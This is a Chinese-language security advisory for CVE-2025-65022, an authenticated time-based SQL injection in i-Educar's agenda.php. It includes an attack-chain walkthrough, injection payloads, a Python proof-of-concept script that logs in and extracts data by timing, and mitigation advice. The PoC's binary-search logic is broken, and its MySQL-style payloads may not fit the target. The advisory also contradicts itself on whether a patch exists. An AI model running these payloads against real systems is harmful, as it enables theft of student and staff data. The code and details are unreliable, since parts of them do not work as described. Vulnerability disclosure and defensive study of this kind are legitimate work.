CVE-2025-65022 | i-Educar 2.10.0及之前版本时间基SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-65022

漏洞类型

SQL注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

i-Educar

漏洞概述

i-Educar是一套免费的在线学校管理软件。2025年11月披露的CVE-2025-65022漏洞影响i-Educar 2.10.0及之前所有版本。该漏洞为经过身份验证的时间基SQL注入（Time-based SQL Injection）漏洞，存在于ieducar/intranet/agenda.php脚本中。漏洞根源在于cod_agenda请求参数未经过滤直接拼接到SQL查询语句中，攻击者利用这一缺陷可构造恶意SQL payload绕过正常查询逻辑，通过数据库延迟函数（如SLEEP()）的时间差异推断数据库内容。成功利用此漏洞可导致应用数据库中的敏感信息泄露，包括学生信息、教师资料、学校财务数据等。此外，攻击者还可在数据库中执行任意SQL命令，进行数据篡改或完全接管数据库系统。由于该漏洞需要高权限会话才能利用，因此主要威胁目标为拥有管理员或教师账号的内部人员。官方已在commit b473f92中发布修复补丁，建议用户立即升级至最新版本。

技术细节

该漏洞是一种典型的时间基SQL注入（Time-based Blind SQL Injection）漏洞。漏洞点位于i-Educar的ieducar/intranet/agenda.php文件，当处理用户请求的cod_agenda参数时，程序直接将该参数值拼接到SQL查询语句中而未进行任何过滤或参数化处理。攻击者需要先获取系统的有效认证会话（如教师或管理员账号），随后构造包含时间延迟函数的恶意cod_agenda参数值。例如，使用如IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)之类的条件语句，通过观察不同条件下的响应时间差异来判断数据库信息。这种时间基注入方式不依赖直接的错误回显，适用于错误信息被屏蔽的场景。攻击者可通过编写脚本自动化遍历猜测数据库名、表名、字段名及具体数据内容。整个攻击过程无需用户交互，攻击者可远程执行。CVSS 3.1评分7.2（高危），向量为AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H，表明通过网络可发起攻击，虽需高权限但影响范围广泛。

攻击链分析

STEP 1

Reconnaissance

攻击者收集目标i-Educar系统信息，识别版本号，确认是否存在未修复的CVE-2025-65022漏洞

STEP 2

Authentication

攻击者获取系统有效用户凭证（教师或管理员账号），可通过钓鱼、社会工程或利用其他漏洞获取

STEP 3

Payload Crafting

构造时间基SQL注入payload，使用条件语句结合SLEEP()函数，如：cod_agenda=1' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)-- -

STEP 4

Blind Injection

发送恶意请求并测量响应时间差异，通过二分法逐字符猜测数据库名、表名、字段名等敏感信息

STEP 5

Data Exfiltration

提取数据库中的敏感数据，如学生个人信息、教师资料、财务记录等

STEP 6

Persistence

利用SQL注入写入后门或进一步横向移动，可能导致完全接管数据库系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-65022 Time-based SQL Injection PoC
# Target: i-Educar <= 2.10.0
# Location: ieducar/intranet/agenda.php
# Authenticated Time-based SQL Injection via cod_agenda parameter

import requests
import time
import string
import sys

TARGET_URL = "http://target.com/ieducar/intranet/agenda.php"
LOGIN_URL = "http://target.com/ieducar/intranet/login.php"
USERNAME = "admin"
PASSWORD = "password"

def login(session):
    """Authenticate to i-Educar and obtain session cookie"""
    data = {
        'login': USERNAME,
        'password': PASSWORD
    }
    resp = session.post(LOGIN_URL, data=data)
    return 'ieducar' in session.cookies.get_dict()

def extract_data(session, payload):
    """Send malicious payload and measure response time"""
    start_time = time.time()
    params = {'cod_agenda': payload}
    try:
        resp = session.get(TARGET_URL, params=params, timeout=30)
    except requests.exceptions.Timeout:
        pass
    elapsed = time.time() - start_time
    return elapsed

def binary_search_char(session, query):
    """Binary search to extract one character"""
    charset = string.printable
    low, high = 0, len(charset) - 1
    while low <= high:
        mid = (low + high) // 2
        char = charset[mid]
        # Time-based blind SQLi payload
        payload = f"1' AND IF({query}='{char}',SLEEP(3),0)-- -"
        elapsed = extract_data(session, payload)
        if elapsed >= 3:
            return char
        # Adjust search range based on character comparison
        payload_gt = f"1' AND IF({query}>{chr(127)},SLEEP(1),0)-- -"
        if extract_data(session, payload_gt) >= 1:
            low = mid + 1
        else:
            high = mid - 1
    return None

def extract_database_version(session):
    """Extract database version using time-based injection"""
    query = "SUBSTRING(@@version,{},1)"
    result = ""
    for i in range(1, 20):
        char = binary_search_char(session, query.format(i))
        if char:
            result += char
        else:
            break
    return result

def main():
    session = requests.Session()
    print("[*] Logging in to i-Educar...")
    if not login(session):
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")
    print("[*] Extracting database version...")
    version = extract_database_version(session)
    print(f"[+] Database version: {version}")

if __name__ == "__main__":
    main()

影响范围

i-Educar <= 2.10.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制agenda.php的访问权限，仅允许受信任的IP访问；2）实施会话监控，检测异常的SQL注入特征请求；3）临时禁用受影响的agenda功能模块；4）部署WAF规则阻止包含SLEEP()、BENCHMARK()等时间函数的请求；5）加强用户认证机制，实施多因素认证以防止账户被盗用。建议尽快完成版本升级以彻底消除该安全风险。